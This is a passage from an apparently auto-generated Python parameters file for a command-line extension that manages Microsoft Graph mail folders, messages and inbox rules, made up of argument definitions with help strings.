c.argument('display_name', type=str, help='The mailFolder\'s display name.')
c.argument('parent_folder_id', type=str,
help='The unique identifier for the mailFolder\'s parent mailFolder.')
c.argument('total_item_count', type=int, help='The number of items in the mailFolder.')
c.argument('unread_item_count', type=int, help='The number of items in the mailFolder marked as unread.')
c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the '
'mailFolder. Expected value: json-string/@json-file.')
c.argument('message_rules', type=validate_file_or_dict, help='The collection of rules that apply to the '
'user\'s Inbox folder. Expected value: json-string/@json-file.')
c.argument('messages', type=validate_file_or_dict, help='The collection of messages in the mailFolder. '
'Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMailFolderMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMailFolderSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
with self.argument_context('mail user-mail-folder create-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('bcc_recipients', type=validate_file_or_dict, help='The Bcc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('body', action=AddBody, nargs='+', help='itemBody')
c.argument('body_preview', type=str,
help='The first 255 characters of the message body. It is in text format.')
c.argument('cc_recipients', type=validate_file_or_dict, help='The Cc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('conversation_id', type=str, help='The ID of the conversation the email belongs to.')
c.argument('conversation_index', help='Indicates the position of the message within the conversation.')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether the message has '
'attachments. This property doesn\'t include inline attachments, so if a message contains only '
'inline attachments, this property is false. To verify the existence of inline attachments, parse '
'the body property to look for a src attribute, such as <IMG src=\'cid:image001.jpg@01D26CD8.6C05F07'
'0\'>.')
c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='')
c.argument('inference_classification', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('internet_message_headers', action=AddInternetMessageHeaders, nargs='+', help='A collection of '
'message headers defined by RFC5322. The set includes message headers indicating the network path '
'taken by a message from the sender to the recipient. It can also contain custom message headers '
'that hold app data for the message. Returned only on applying a $select query option. Read-only.')
c.argument('internet_message_id', type=str, help='The message ID in the format specified by RFC2822.')
c.argument('is_delivery_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('is_draft', arg_type=get_three_state_flag(), help='Indicates whether the message is a draft. A '
'message is a draft if it hasn\'t been sent yet.')
c.argument('is_read', arg_type=get_three_state_flag(), help='Indicates whether the message has been read.')
c.argument('is_read_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('parent_folder_id', type=str, help='The unique identifier for the message\'s parent mailFolder.')
c.argument('received_date_time', help='The date and time the message was received.')
c.argument('reply_to', type=validate_file_or_dict, help='The email addresses to use when replying. Expected '
'value: json-string/@json-file.')
c.argument('sent_date_time', help='The date and time the message was sent.')
c.argument('subject', type=str, help='The subject of the message.')
c.argument('to_recipients', type=validate_file_or_dict, help='The To: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('unique_body', action=AddBody, nargs='+', help='itemBody')
c.argument('web_link', type=str, help='The URL to open the message in Outlook Web App.You can append an '
'ispopout argument to the end of the URL to change how the message is displayed. If ispopout is not '
'present or if it is set to 1, then the message is shown in a popout window. If ispopout is set to '
'0, then the browser will show the message in the Outlook Web App review pane.The message will open '
'in the browser if you are logged in to your mailbox via Outlook Web App. You will be prompted to '
'login if you are not already logged in with the browser.This URL can be accessed from within an '
'iFrame.')
c.argument('attachments', action=AddAttachments, nargs='+', help='The fileAttachment and itemAttachment '
'attachments for the message.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the message. Nullable.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMessageMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the message. '
'Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMessageSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the message. '
'Nullable.')
c.argument('email_address', action=AddEmailAddress, nargs='+', help='emailAddress', arg_group='Sender')
c.argument('microsoft_graph_email_address', action=AddEmailAddress, nargs='+', help='emailAddress',
arg_group='From')
c.argument('completed_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
c.argument('due_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone', arg_group='Flag')
c.argument('flag_status', arg_type=get_enum_type(['notFlagged', 'complete', 'flagged']), help='',
arg_group='Flag')
c.argument('start_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
with self.argument_context('mail user-mail-folder create-message-rule') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('display_name', type=str, help='The display name of the rule.')
c.argument('has_error', arg_type=get_three_state_flag(), help='Indicates whether the rule is in an error '
'condition. Read-only.')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='Indicates whether the rule is enabled to be '
'applied to messages.')
c.argument('is_read_only', arg_type=get_three_state_flag(), help='Indicates if the rule is read-only and '
'cannot be modified or deleted by the rules REST API.')
c.argument('sequence', type=int, help='Indicates the order in which the rule is executed, among other rules.')
c.argument('body_contains', nargs='+', help='Represents the strings that should appear in the body of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('body_or_subject_contains', nargs='+', help='Represents the strings that should appear in the body '
'or subject of an incoming message in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('categories', nargs='+', help='Represents the categories that an incoming message should be labeled '
'with in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('from_addresses', type=validate_file_or_dict, help='Represents the specific sender email addresses '
'of an incoming message in order for the condition or exception to apply. Expected value: '
'json-string/@json-file.', arg_group='Exceptions')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must have attachments in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('header_contains', nargs='+', help='Represents the strings that appear in the headers of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='', arg_group='Exceptions')
c.argument('exceptions_is_approval_request', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be an approval request in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_automatic_forward', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be automatically forwarded in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_automatic_reply', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be an auto reply in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_encrypted', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be encrypted in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_meeting_request', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a meeting request in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_meeting_response', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a meeting response in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_non_delivery_report', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a non-delivery report in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_permission_controlled', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be permission controlled (RMS-protected) in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('exceptions_is_read_receipt', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a read receipt in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_signed', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be S/MIME-signed in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_voicemail', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a voice mail in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('message_action_flag', arg_type=get_enum_type(['any', 'call', 'doNotForward', 'followUp', 'fyi',
'forward', 'noResponseNecessary', 'read', 'reply',
'replyToAll', 'review']), help='',
arg_group='Exceptions')
c.argument('not_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must not be a recipient of an incoming message in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('recipient_contains', nargs='+', help='Represents the strings that appear in either the '
'toRecipients or ccRecipients properties of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sender_contains', nargs='+', help='Represents the strings that appear in the from property of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('sensitivity', arg_type=get_enum_type(['normal', 'personal', 'private', 'confidential']), help='',
arg_group='Exceptions')
c.argument('sent_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must be in the ccRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sent_only_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be the only recipient in an incoming message in order for the condition or exception '
'to apply.', arg_group='Exceptions')
c.argument('sent_to_addresses', type=validate_file_or_dict, help='Represents the email addresses that an '
'incoming message must have been sent to in order for the condition or exception to apply. Expected '
'value: json-string/@json-file.', arg_group='Exceptions')
c.argument('sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must be in the toRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sent_to_or_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in either a toRecipients or ccRecipients property of an incoming message in order '
'for the condition or exception to apply.', arg_group='Exceptions')
c.argument('subject_contains', nargs='+', help='Represents the strings that appear in the subject of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('within_size_range', action=AddWithinSizeRange, nargs='+', help='sizeRange',
arg_group='Exceptions')
c.argument('microsoft_graph_message_rule_predicates_body_contains', nargs='+', help='Represents the strings '
'that should appear in the body of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_body_or_subject_contains_body_or_subject_contains',
nargs='+', help='Represents the strings that should appear in the body or subject of an incoming '
'message in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_categories', nargs='+', help='Represents the categories '
'that an incoming message should be labeled with in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_from_addresses', type=validate_file_or_dict,
help='Represents the specific sender email addresses of an incoming message in order for the '
'condition or exception to apply. Expected value: json-string/@json-file.', arg_group='Conditions')
c.argument('boolean_has_attachments', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must have attachments in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_header_contains', nargs='+', help='Represents the strings '
'that appear in the headers of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='',
arg_group='Conditions')
c.argument('is_approval_request', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be an approval request in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_automatic_forward', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be automatically forwarded in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_automatic_reply', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be an auto reply in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_encrypted', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must '
'be encrypted in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_meeting_request', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a meeting request in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_meeting_response', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a meeting response in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_non_delivery_report', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a non-delivery report in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_permission_controlled', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be permission controlled (RMS-protected) in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('is_read_receipt', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a read receipt in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_signed', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must be '
'S/MIME-signed in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_voicemail', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must '
'be a voice mail in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_action_flag_message_action_flag', arg_type=get_enum_type(['any', 'call',
'doNotForward',
'followUp',
'fyi', 'forward',
'noResponseNecessary',
'read', 'reply',
'replyToAll',
'review']),
help='', arg_group='Conditions')
c.argument('boolean_not_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must not be a recipient of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_recipient_contains', nargs='+', help='Represents the '
'strings that appear in either the toRecipients or ccRecipients properties of an incoming message '
'in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_sender_contains', nargs='+', help='Represents the strings '
'that appear in the from property of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_sensitivity', arg_type=get_enum_type(['normal', 'personal', 'private',
'confidential']), help='',
arg_group='Conditions')
c.argument('boolean_sent_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in the ccRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('boolean_sent_only_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of '
'the mailbox must be the only recipient in an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_sent_to_addresses_sent_to_addresses',
type=validate_file_or_dict, help='Represents the email addresses that an incoming message must have '
'been sent to in order for the condition or exception to apply. Expected value: '
'json-string/@json-file.', arg_group='Conditions')
c.argument('boolean_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in the toRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('boolean_sent_to_or_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of '
'the mailbox must be in either a toRecipients or ccRecipients property of an incoming message in '
'order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_subject_contains', nargs='+', help='Represents the strings '
'that appear in the subject of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_size_range_within_size_range', action=AddWithinSizeRange, nargs='+',
help='sizeRange', arg_group='Conditions')
c.argument('assign_categories', nargs='+', help='A list of categories to be assigned to a message.',
arg_group='Actions')
c.argument('copy_to_folder', type=str, help='The ID of a folder that a message is to be copied to.',
arg_group='Actions')
c.argument('delete', arg_type=get_three_state_flag(), help='Indicates whether a message should be moved to the '
'Deleted Items folder.', arg_group='Actions')
c.argument('forward_as_attachment_to', type=validate_file_or_dict, help='The email addresses of the recipients '
'to which a message should be forwarded as an attachment. Expected value: json-string/@json-file.',
arg_group='Actions')
c.argument('forward_to', type=validate_file_or_dict, help='The email addresses of the recipients to which a '
'message should be forwarded. Expected value: json-string/@json-file.', arg_group='Actions')
c.argument('mark_as_read', arg_type=get_three_state_flag(), help='Indicates whether a message should be marked '
'as read.', arg_group='Actions')
c.argument('mark_importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='', arg_group='Actions')
c.argument('move_to_folder', type=str, help='The ID of the folder that a message will be moved to.',
arg_group='Actions')
c.argument('permanent_delete', arg_type=get_three_state_flag(), help='Indicates whether a message should be '
'permanently deleted and not saved to the Deleted Items folder.', arg_group='Actions')
c.argument('redirect_to', type=validate_file_or_dict, help='The email addresses to which a message should be '
'redirected. Expected value: json-string/@json-file.', arg_group='Actions')
c.argument('stop_processing_rules', arg_type=get_three_state_flag(), help='Indicates whether subsequent rules '
'should be evaluated.', arg_group='Actions')
with self.argument_context('mail user-mail-folder create-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-mail-folder create-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('mail user-mail-folder delete-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('mail_folder_id1', type=str, help='key: id of mailFolder')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder delete-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder delete-message-rule') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_rule_id', type=str, help='key: id of messageRule')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder delete-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder delete-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder list-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder list-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder list-message-rule') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder list-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder list-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder show-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('mail_folder_id1', type=str, help='key: id of mailFolder')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder show-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder show-message-rule') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_rule_id', type=str, help='key: id of messageRule')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder show-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder show-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder update-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('mail_folder_id1', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('child_folder_count', type=int, help='The number of immediate child mailFolders in the current '
'mailFolder.')
c.argument('display_name', type=str, help='The mailFolder\'s display name.')
c.argument('parent_folder_id', type=str,
help='The unique identifier for the mailFolder\'s parent mailFolder.')
c.argument('total_item_count', type=int, help='The number of items in the mailFolder.')
c.argument('unread_item_count', type=int, help='The number of items in the mailFolder marked as unread.')
c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the '
'mailFolder. Expected value: json-string/@json-file.')
c.argument('message_rules', type=validate_file_or_dict, help='The collection of rules that apply to the '
'user\'s Inbox folder. Expected value: json-string/@json-file.')
c.argument('messages', type=validate_file_or_dict, help='The collection of messages in the mailFolder. '
'Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMailFolderMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMailFolderSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
with self.argument_context('mail user-mail-folder update-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('bcc_recipients', type=validate_file_or_dict, help='The Bcc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('body', action=AddBody, nargs='+', help='itemBody')
c.argument('body_preview', type=str,
help='The first 255 characters of the message body. It is in text format.')
c.argument('cc_recipients', type=validate_file_or_dict, help='The Cc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('conversation_id', type=str, help='The ID of the conversation the email belongs to.')
c.argument('conversation_index', help='Indicates the position of the message within the conversation.')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether the message has '
'attachments. This property doesn\'t include inline attachments, so if a message contains only '
'inline attachments, this property is false. To verify the existence of inline attachments, parse '
'the body property to look for a src attribute, such as <IMG src=\'cid:image001.jpg@01D26CD8.6C05F07'
'0\'>.')
c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='')
c.argument('inference_classification', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('internet_message_headers', action=AddInternetMessageHeaders, nargs='+', help='A collection of '
'message headers defined by RFC5322. The set includes message headers indicating the network path '
'taken by a message from the sender to the recipient. It can also contain custom message headers '
'that hold app data for the message. Returned only on applying a $select query option. Read-only.')
c.argument('internet_message_id', type=str, help='The message ID in the format specified by RFC2822.')
c.argument('is_delivery_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('is_draft', arg_type=get_three_state_flag(), help='Indicates whether the message is a draft. A '
'message is a draft if it hasn\'t been sent yet.')
c.argument('is_read', arg_type=get_three_state_flag(), help='Indicates whether the message has been read.')
c.argument('is_read_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('parent_folder_id', type=str, help='The unique identifier for the message\'s parent mailFolder.')
c.argument('received_date_time', help='The date and time the message was received.')
c.argument('reply_to', type=validate_file_or_dict, help='The email addresses to use when replying. Expected '
'value: json-string/@json-file.')
c.argument('sent_date_time', help='The date and time the message was sent.')
c.argument('subject', type=str, help='The subject of the message.')
c.argument('to_recipients', type=validate_file_or_dict, help='The To: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('unique_body', action=AddBody, nargs='+', help='itemBody')
c.argument('web_link', type=str, help='The URL to open the message in Outlook Web App. You can append an '
'ispopout argument to the end of the URL to change how the message is displayed. If ispopout is not '
'present or if it is set to 1, then the message is shown in a popout window. If ispopout is set to '
'0, then the browser will show the message in the Outlook Web App review pane. The message will open '
'in the browser if you are logged in to your mailbox via Outlook Web App. You will be prompted to '
'log in if you are not already logged in with the browser. This URL can be accessed from within an '
'iFrame.')
c.argument('attachments', action=AddAttachments, nargs='+', help='The fileAttachment and itemAttachment '
'attachments for the message.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the message. Nullable.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMessageMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the message. '
'Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMessageSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the message. '
'Nullable.')
c.argument('email_address', action=AddEmailAddress, nargs='+', help='emailAddress', arg_group='Sender')
c.argument('microsoft_graph_email_address', action=AddEmailAddress, nargs='+', help='emailAddress',
arg_group='From')
c.argument('completed_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
c.argument('due_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone', arg_group='Flag')
c.argument('flag_status', arg_type=get_enum_type(['notFlagged', 'complete', 'flagged']), help='',
arg_group='Flag')
c.argument('start_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
with self.argument_context('mail user-mail-folder update-message-rule') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_rule_id', type=str, help='key: id of messageRule')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('display_name', type=str, help='The display name of the rule.')
c.argument('has_error', arg_type=get_three_state_flag(), help='Indicates whether the rule is in an error '
'condition. Read-only.')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='Indicates whether the rule is enabled to be '
'applied to messages.')
c.argument('is_read_only', arg_type=get_three_state_flag(), help='Indicates if the rule is read-only and '
'cannot be modified or deleted by the rules REST API.')
c.argument('sequence', type=int, help='Indicates the order in which the rule is executed, among other rules.')
c.argument('body_contains', nargs='+', help='Represents the strings that should appear in the body of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('body_or_subject_contains', nargs='+', help='Represents the strings that should appear in the body '
'or subject of an incoming message in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('categories', nargs='+', help='Represents the categories that an incoming message should be labeled '
'with in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('from_addresses', type=validate_file_or_dict, help='Represents the specific sender email addresses '
'of an incoming message in order for the condition or exception to apply. Expected value: '
